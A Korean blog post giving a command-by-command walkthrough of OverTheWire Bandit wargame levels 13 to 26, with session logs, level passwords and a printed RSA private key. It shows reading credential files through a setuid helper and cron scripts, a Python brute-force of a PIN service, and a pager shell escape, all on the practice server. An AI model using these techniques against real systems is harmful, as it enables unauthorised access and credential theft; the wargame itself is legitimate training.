본문으로 바로가기

OvertheWire - Bandit 풀이 2

category SOLUTION/Overthewire 2017. 6. 5. 20:07


   OvertheWire - Bandit 풀이 2


   OvertheWire - http://overthewire.org/wargames/bandit/


접속 -  ssh : bandit.labs.overthewire.org   port : 2220


Level13  Level14

login : bandit13 passwd : 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

1
2
3
4
5
6
7
8
9
10
11
12
bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ mkdir /tmp/myname11
bandit13@bandit:~$ cp sshkey.private /tmp/myname11
bandit13@bandit:~$ cd /tmp/myname11
bandit13@bandit:/tmp/myname11$ ls -al sshkey.private
-rw-r----- 1 bandit13 bandit13 1679 Jun  5 10:54 sshkey.private
bandit13@bandit:/tmp/myname11$ chmod 400 sshkey.private
bandit13@bandit:/tmp/myname11$ ssh -i sshkey.private bandit14@localhost
 
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

IT Security


Level14 → Level15

login : bandit14    passwd : ssh privatekey 이용 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

1
2
3
4
5
6
7
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
 
bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr

IT Security


Level15  Level 16

login : bandit15    passwd : BfMYroe26WYalil77FoDi9qh59eK5xNr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
bandit15@bandit:~$ openssl s_client -connect localhost:30001 -ign_eof
CONNECTED(00000003)
depth=0 CN = a9678380ab81
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = a9678380ab81
verify return:1
---
Certificate chain
 0 s:/CN=a9678380ab81
   i:/CN=a9678380ab81
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICvjCCAaagAwIBAgIJAKN+l8oXunsSMA0GCSqGSIb3DQEBCwUAMBcxFTATBgNV
BAMTDGE5Njc4MzgwYWI4MTAeFw0xNzA2MDUyMDE5MTFaFw0yNzA2MDMyMDE5MTFa
MBcxFTATBgNVBAMTDGE5Njc4MzgwYWI4MTCCASIwDQYJKoZIhvcNAQEBBQADggEP
ADCCAQoCggEBAOiX58JUHEv/HSMv1OGINWsDBfbgGNgchrr+kCccc6N7nzs8orez
eiBgRDlNHuiv8u0UbxU1Czro1Esq/Wl+h/hQEK+MKmf+Ywn7Wi6Qkd405coTuIAk
3UHNYesYAfPOcx3JF4TgPNqSJfV2pgfxyAHiLZPJLTExxSMpPSt6FqBfgokimnIw
OP8aj/rudca0h49yi1+1bgJdASzAWRo8FT+IAnuPM6X4HdrynJ5J1gwLy82kohAy
LyAEuN+/zI9+uN8al9SsZOik0d06PxlqZ2JaJEggG7x90bi1NKz8bQDBn4XN2dzl
CeVpvSczlvsQ+gbh7WSMiIf1oovKYgY4mE8CAwEAAaMNMAswCQYDVR0TBAIwADAN
BgkqhkiG9w0BAQsFAAOCAQEAlhxE28VbxInSsqRYXML08SzfsqA4yEVd5dt7k1p6
hLXBiSoesRc07AEx8xKCbpUpSxJeUz4aTDFSD1W82ETNaLD224dXrnMZKSQk4p0t
S7+Vht+lHW5iVORcdFvGoYrX2cnzqJ1rWzpFZjv7Nhc7NILzIsxvnP3foYflWAHE
vyIROZMZBhqq1BFyjXo5xR54OR6wZBuQpumpU8HiaucDgBfv7vWNf7kDzYWWZ/EU
ANEE/NQ3K2Eu/PY/4tQFuxvkIszY4Ys74/Mor6StRt/8NZPDKTyT9b7dvoVTMFMO
rUAFwt3Vcm4gEjJrHiUVAPeADM+zWU7h6G1g+axgmdPMdw==
-----END CERTIFICATE-----
subject=/CN=a9678380ab81
issuer=/CN=a9678380ab81
---
No client certificate CA names sent
---
SSL handshake has read 1682 bytes and written 637 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv3
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 593FADB9483C3DD0D0283B7A351A874EB583394BD7094C6F2156B283BBD49890
    Session-ID-ctx:
    Master-Key: 730C4A9E11BC28FD3138044D7148BFF18CCEEE8AE9F4CBF3D2927CB54C6777E769B8BC3915FB714A4003F319D22442F0
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1496718299
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd

IT Security


Level16  Level17

login : bandit16    passwd : cluFn7wTiGryunymYOu4RcffSxQluehd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
bandit16@bandit:~$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.11:42267        0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31518           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31046           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31691           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2220            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31790           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:30000           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:30001           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:113             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:30002           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31960           0.0.0.0:*               LISTEN
tcp        0      0 172.18.0.7:22           172.18.0.1:33182        ESTABLISHED
tcp        0      0 127.0.0.1:52378         127.0.0.1:22            ESTABLISHED
tcp        0      0 127.0.0.1:22            127.0.0.1:52378         ESTABLISHED
tcp6       0      0 :::2220                 :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
bandit16@bandit:~$ openssl s_client -connect localhost:31790 -ign_eof
CONNECTED(00000003)
depth=0 CN = a9678380ab81
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = a9678380ab81
verify return:1
---
Certificate chain
 0 s:/CN=a9678380ab81
   i:/CN=a9678380ab81
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICvjCCAaagAwIBAgIJAKN+l8oXunsSMA0GCSqGSIb3DQEBCwUAMBcxFTATBgNV
BAMTDGE5Njc4MzgwYWI4MTAeFw0xNzA2MDUyMDE5MTFaFw0yNzA2MDMyMDE5MTFa
MBcxFTATBgNVBAMTDGE5Njc4MzgwYWI4MTCCASIwDQYJKoZIhvcNAQEBBQADggEP
ADCCAQoCggEBAOiX58JUHEv/HSMv1OGINWsDBfbgGNgchrr+kCccc6N7nzs8orez
eiBgRDlNHuiv8u0UbxU1Czro1Esq/Wl+h/hQEK+MKmf+Ywn7Wi6Qkd405coTuIAk
3UHNYesYAfPOcx3JF4TgPNqSJfV2pgfxyAHiLZPJLTExxSMpPSt6FqBfgokimnIw
OP8aj/rudca0h49yi1+1bgJdASzAWRo8FT+IAnuPM6X4HdrynJ5J1gwLy82kohAy
LyAEuN+/zI9+uN8al9SsZOik0d06PxlqZ2JaJEggG7x90bi1NKz8bQDBn4XN2dzl
CeVpvSczlvsQ+gbh7WSMiIf1oovKYgY4mE8CAwEAAaMNMAswCQYDVR0TBAIwADAN
BgkqhkiG9w0BAQsFAAOCAQEAlhxE28VbxInSsqRYXML08SzfsqA4yEVd5dt7k1p6
hLXBiSoesRc07AEx8xKCbpUpSxJeUz4aTDFSD1W82ETNaLD224dXrnMZKSQk4p0t
S7+Vht+lHW5iVORcdFvGoYrX2cnzqJ1rWzpFZjv7Nhc7NILzIsxvnP3foYflWAHE
vyIROZMZBhqq1BFyjXo5xR54OR6wZBuQpumpU8HiaucDgBfv7vWNf7kDzYWWZ/EU
ANEE/NQ3K2Eu/PY/4tQFuxvkIszY4Ys74/Mor6StRt/8NZPDKTyT9b7dvoVTMFMO
rUAFwt3Vcm4gEjJrHiUVAPeADM+zWU7h6G1g+axgmdPMdw==
-----END CERTIFICATE-----
subject=/CN=a9678380ab81
issuer=/CN=a9678380ab81
---
No client certificate CA names sent
---
SSL handshake has read 1682 bytes and written 637 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv3
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 44D6D6D561A130DFF2E31AB4731497C17A3EEB907E274CEDD92FBEF70D97DDD7
    Session-ID-ctx:
    Master-Key: 8A443D005F46DD14997CC6CD703BCE57A264573C37E5672673F149F11500E50A7C3521627332E07BE93CEE5B223D155B
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1496718535
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----
bandit16@bandit:~$ mkdir /tmp/myname13
bandit16@bandit:~$ cd /tmp/myname13
bandit16@bandit:/tmp/myname13$ vi ssh.key
bandit16@bandit:/tmp/myname13$ ls -al
total 12
drwxrwxr-x 2 bandit16 bandit16 4096 Jun  6 03:10 .
drwxrwx-wt 3 root     root     4096 Jun  6 03:10 ..
-rw-rw-r-- 1 bandit16 bandit16 1676 Jun  6 03:10 ssh.key
bandit16@bandit:/tmp/myname13$ chmod 400 ssh.key
bandit16@bandit:/tmp/myname13$ ls -al
total 12
drwxrwxr-x 2 bandit16 bandit16 4096 Jun  6 03:10 .
drwxrwx-wt 3 root     root     4096 Jun  6 03:10 ..
-r-------- 1 bandit16 bandit16 1676 Jun  6 03:10 ssh.key
bandit16@bandit:/tmp/myname13$ ssh -i ssh.key bandit17@localhost

IT Security


Level17  Level18

login : bandit17    passwd : rsa private key통해서 바로 접속 xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

1
2
3
4
5
6
7
bandit17@bandit:~$ ls
passwords.new  passwords.old
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> OaxZoUOzBod2mEDgQikLmyGeCCR95bZt

IT Security


Level18  Level19

login : bandit18    passwd : kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

바로 연결이 끊긴다(byebye)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
bandit17@bandit:~$ ssh bandit18@localhost /bin/bash
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ee:4c:8c:e7:57:2c:bc:63:24:b8:e6:23:27:63:72:9f.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit17/.ssh/known_hosts).
 _                     _ _ _
| |__   __ _ _ __   __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
 
a http://www.overthewire.org wargame.
 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0640 for '/home/bandit17/.ssh/id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /home/bandit17/.ssh/id_rsa
bandit18@localhost's password:
ls
readme
cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

IT Security


Level19  Level20

login : bandit19    passwd : IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bandit19@bandit:~$ ls -al
total 32
drwxr-xr-x  3 bandit19 bandit19 4096 Jun  6 03:18 .
drwxr-xr-x 34 root     root     4096 Jun  6 03:18 ..
-rw-r--r--  1 bandit19 bandit19  220 Apr  9  2014 .bash_logout
-rw-r--r--  1 bandit19 bandit19 3637 Apr  9  2014 .bashrc
drwx------  2 bandit19 bandit19 4096 Jun  6 03:18 .cache
-rw-r--r--  1 bandit19 bandit19  675 Apr  9  2014 .profile
-rwsr-x---  1 bandit20 bandit19 7378 Jun  5 20:26 bandit20-do
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
  Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do id
uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11020(bandit20),11019(bandit19)
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

IT Security


Level20  Level21

login : bandit20    passwd : GbKksEFF4yrVs6il55v6gwY5aVje5f0j

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
bandit20@bandit:~$ ls -al
total 36
drwxr-xr-x  3 bandit20 bandit20 4096 Jun  6 03:31 .
drwxr-xr-x 35 root     root     4096 Jun  6 03:22 ..
-rw-------  1 bandit20 bandit20   89 Jun  6 03:31 .bash_history
-rw-r--r--  1 bandit20 bandit20  220 Apr  9  2014 .bash_logout
-rw-r--r--  1 bandit20 bandit20 3637 Apr  9  2014 .bashrc
drwx------  2 bandit20 bandit20 4096 Jun  6 03:22 .cache
-rw-r--r--  1 bandit20 bandit20  675 Apr  9  2014 .profile
-rwsr-x---  1 bandit21 bandit20 8014 Jun  5 20:26 suconnect
bandit20@bandit:~$ ./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. 
If it receives the correct password from the other side, the next password is transmitted back.
bandit20@bandit:~$ nc -l 20000
^Z
[1]+  Stopped                 nc -l 20000
bandit20@bandit:~$ ./suconnect 20000
^Z
[2]+  Stopped                 ./suconnect 20000
bandit20@bandit:~$ fg 1
nc -l 20000
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
^Z
[1]+  Stopped                 nc -l 20000
bandit20@bandit:~$ fg 2
./suconnect 20000
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
bandit20@bandit:~$ fg 1
nc -l 20000
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

IT Security


Level21  Level22

login : bandit21    passwd : gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

1
2
3
4
5
6
7
8
9
10
11
12
bandit21@bandit:~$ cd /etc/cron.d/
bandit21@bandit:/etc/cron.d$ ls
cron-apt  cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  php5
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

IT Security


Level22  Level23

login : bandit22    passwd : Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
bandit22@bandit:~$ cd /etc/cron.d/
bandit22@bandit:/etc/cron.d$ ls
cron-apt  cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  php5
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
 
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
 
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
 
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

IT Security


Level23  Level24

login : bandit23    passwd : jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
bandit23@bandit:~$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls
cron-apt  cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  php5
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
 
myname=$(whoami)
 
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done
 
 
bandit23@bandit:/etc/cron.d$ mkdir /tmp/myname14
bandit23@bandit:/etc/cron.d$ cd /tmp/myname14
bandit23@bandit:/tmp/myname14$ vi test
bandit23@bandit:/tmp/myname14$ cat test
cd /var/spool/bandit24
cat /etc/bandit_pass/bandit24 > text.txt
cat text.txt
bandit23@bandit:/tmp/myname14$ chmod 777 test
bandit23@bandit:/tmp/myname14$ ls -al test
-rwxrwxrwx 1 bandit23 bandit23 77 Jun  6 03:49 test
bandit23@bandit:/tmp/myname14$ cd /var/spool/bandit24
bandit23@bandit:/var/spool/bandit24$ cp /tmp/myname14/test .
bandit23@bandit:/var/spool/bandit24$ ./test
./test: line 2: text.txt: Permission denied
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

IT Security


Level24  Level25

login : bandit24    passwd : UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 
and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1
Wrong! Please enter the correct pincode. Try again.
^C
bandit24@bandit:~$ vi password.py
bandit24@bandit:~$ cat password.py
import socket
for pin in range(1,10000):
  sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  sock.connect(('localhost',30002))
  msg = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ ' + str(pin) + '\n'
  message = sock.recv(65535)
  sock.send(msg.encode())
  print(message,pin)
  data = sock.recv(65535)
  data = data.decode()
  if not 'Wrong' in data:
    print(pin)
    print(data)
    break
  sock.close()
bandit24@bandit:~$ python3 password.py
...
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

IT Security


Level25  Level26

login : bandit25    passwd : uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ cat /etc/passwd
...
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
...
bandit25@bandit:~$ file /usr/bin/showtext
/usr/bin/showtext: POSIX shell script, ASCII text executable
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
 
more ~/text.txt
exit 0
 
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
v
!r /etc/bandit_pass/bandit26
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

IT Security





저작자표시 비영리 변경금지

'SOLUTION > Overthewire' 카테고리의 다른 글

[Natas]Natas3 - Natas4  (0) 2017.07.07
[Natas] Natas2 - Natas3  (0) 2017.07.07
[Natas] Natas1 - Natas2  (0) 2017.07.07
[Natas] Natas0 - Natas1  (0) 2017.07.07
OvertheWire - Bandit 풀이1  (0) 2017.06.05
댓글 , 엮인글
IT Security
블로그 이미지 lena04 님의 블로그
MENU
CATEGORY
VISITOR 오늘 / 전체

티스토리툴바